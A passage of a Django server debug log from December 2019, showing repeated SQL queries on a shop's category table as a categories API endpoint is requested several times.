"shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:12,709 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:12,711 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:12,713 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:12] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:15,235 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:15,239 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:15,242 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:15,245 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:15,248 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:15,250 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:15,252 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:15,254 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:15,257 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:15,259 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:15,261 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:15] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:16,718 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:16,725 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:16,729 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:16,733 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:16,736 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:16,740 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:16,744 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:16,747 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:16,751 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:16,754 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:16,758 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:16] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:18,782 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:18,788 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:18,790 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:18,793 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:18,796 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:18,798 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:18,800 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:18,802 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:18,804 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:18,807 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:18,810 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:18] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:20,450 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:20,458 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:20,462 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:20,464 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:20,466 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:20,469 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:20,472 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:20,476 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:20,478 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:20,481 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:20,483 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:20] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:21,852 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:21,863 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:21,867 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:21,869 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:21,872 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:21,874 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:21,877 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:21,879 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:21,881 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:21,883 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:21,886 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:21] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:23,097 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:23,103 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:23,105 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:23,108 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:23,110 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:23,112 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:23,115 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:23,117 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:23,120 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:23,122 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:23,124 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:23] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 12:57:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 12:57:24,422 utils 32196 